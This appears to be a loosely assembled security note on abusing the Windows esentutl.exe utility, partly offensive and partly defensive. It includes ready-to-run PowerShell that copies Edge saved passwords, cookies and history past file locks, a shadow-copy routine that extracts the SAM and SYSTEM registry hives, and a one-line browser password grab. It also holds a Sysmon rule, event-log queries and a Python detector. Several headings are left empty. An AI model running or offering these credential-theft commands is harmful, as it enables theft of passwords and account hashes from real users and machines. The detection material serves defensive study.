Esentutl.exe is the ESE database utility built into Windows. Its file-copy mode can bypass file locks, so it is also a favourite tool for attackers who want to steal data.
Path: C:\Windows\System32\esentutl.exe
Relevant switches: /y (copy a file), /vss (read the source through a volume shadow copy)
First confirm that esentutl runs correctly:
echo test > t.txt
esentutl /y t.txt /d c.txt /o
cat c.txt
rm t.txt,c.txt -Force
If you see "Operation completed successfully", it is working.
Bypassing the browser's file lock to copy stored passwords and cookies:
$b = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default"
$o = "$env:TEMP\bd"
mkdir $o -Force | Out-Null
ls "$b\*Data","$b\Cookies","$b\History" -EA 0 | % {
esentutl /y $_.FullName /d "$o\$($_.Name).db" /o 2>$null
}
Compress-Archive $o "$env:TEMP\b.zip" -F
echo "Done: $env:TEMP\b.zip"
rm $o -Recurse -Force
Analysis of the output:
While running, esentutl shows the copy progress:
Initiating COPY FILE mode...
Source File: ...\Login Data
Copy Progress: |----|----|----|----|
Operation completed successfully
Technical points:
Attack value:
Combining it with a volume shadow copy to reach the SAM database:
vssadmin create shadow /for=C: 2>$null
$s = (vssadmin list shadows | Select-String "HarddiskVolumeShadowCopy" | Select -Last 1) -replace '.*Copy(\d+).*','$1'
if($s){
$p = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$s"
esentutl /y "$p\Windows\System32\config\SAM" /d "$env:TEMP\SAM" /o 2>$null
esentutl /y "$p\Windows\System32\config\SYSTEM" /d "$env:TEMP\SYSTEM" /o 2>$null
if(Test-Path "$env:TEMP\SAM"){echo "[+] SAM extracted"}
if(Test-Path "$env:TEMP\SYSTEM"){echo "[+] SYSTEM extracted"}
rm "$env:TEMP\SAM","$env:TEMP\SYSTEM" -F -EA 0
}
Attack value:
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4688} |
? {$_.Message -match 'esentutl.*/y'}
<RuleGroup name="Esentutl_Abuse">
<ProcessCreate onmatch="include">
<Image condition="end with">esentutl.exe</Image>
<CommandLine condition="contains any">Login Data;Cookies;SAM;SYSTEM;/y</CommandLine>
</ProcessCreate>
</RuleGroup>
icacls C:\Windows\System32\esentutl.exe /grant Administrators:(RX) /inheritance:r
auditpol /set /subcategory:"File System" /success:enable /failure:enable
wevtutil qe Security /q:"*[System[EventID=4663]]" /f:text | findstr /i /c:"Login Data" /c:"\config\SAM"
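As an added example that is not part of this note, the Python script below applies the same criteria as the Sysmon rule and the 4688 filter above to 4688-style "Process Command Line" text: it parses esentutl copy-mode (/y) invocations and rates each one by whether the source is a browser credential store, a registry hive, or a shadow-copy path. The sample event lines and the path patterns are constructed for the example.

```python
import re
import shlex

# Constructed patterns for the sources named in this note's scripts and Sysmon rule:
# browser credential stores, registry hives and shadow-copy device paths.
SENSITIVE = {
    "browser_store": re.compile(r"\\(Login Data|Web Data|Cookies|History)$", re.I),
    "registry_hive": re.compile(r"\\config\\(SAM|SYSTEM|SECURITY)$", re.I),
    "shadow_copy": re.compile(r"GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+", re.I),
}

def analyze_esentutl(cmdline):
    """Return a finding for an esentutl copy-mode (/y) command line, else None."""
    try:
        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None  # unbalanced quotes: leave it to a human
    if not argv or argv[0].lower().rsplit("\\", 1)[-1] not in ("esentutl", "esentutl.exe"):
        return None
    flags = [a.lower() for a in argv[1:] if a.startswith("/")]
    if "/y" not in flags:
        return None  # other ESE modes (/p, /r, ...) are not the copy primitive
    def arg_after(flag):  # positional value following a switch, e.g. /y <src>, /d <dst>
        idx = [i for i, a in enumerate(argv) if a.lower() == flag]
        return argv[idx[0] + 1] if idx and idx[0] + 1 < len(argv) else ""
    source, dest = arg_after("/y"), arg_after("/d")
    reasons = [name for name, pat in SENSITIVE.items() if pat.search(source)]
    if "/vss" in flags and "shadow_copy" not in reasons:
        reasons.append("shadow_copy")  # /vss reads a locked file through VSS
    return {"source": source, "dest": dest, "reasons": reasons,
            "severity": "high" if reasons else "low"}

def scan_4688(lines):
    """Extract 'Process Command Line:' values from 4688-style text and analyze each."""
    findings = []
    for line in lines:
        m = re.search(r"Process Command Line:\s*(.+)$", line)
        if m:
            finding = analyze_esentutl(m.group(1).strip())
            if finding:
                findings.append(finding)
    return findings

# Constructed sample events (not real logs) mirroring the commands in this note.
SAMPLE_4688 = [
    r'Process Command Line: esentutl /y "C:\Users\u\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /d pwd.db /o',
    r'Process Command Line: esentutl /y "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM" /d C:\Temp\SAM /o',
    r"Process Command Line: esentutl /y t.txt /d c.txt /o",
    r"Process Command Line: esentutl /p C:\db\edb.db",
    r"Process Command Line: C:\Windows\System32\notepad.exe",
]
```

Run scan_4688(SAMPLE_4688) to get one finding per esentutl /y event; the plain t.txt copy is rated low, the browser-store and shadow-copy hive copies high.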
esentutl /y * /d *
- Esentutl's file-copy mode is dangerous because:
Stealing browser passwords in one line:
esentutl /y "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data" /d pwd.db /o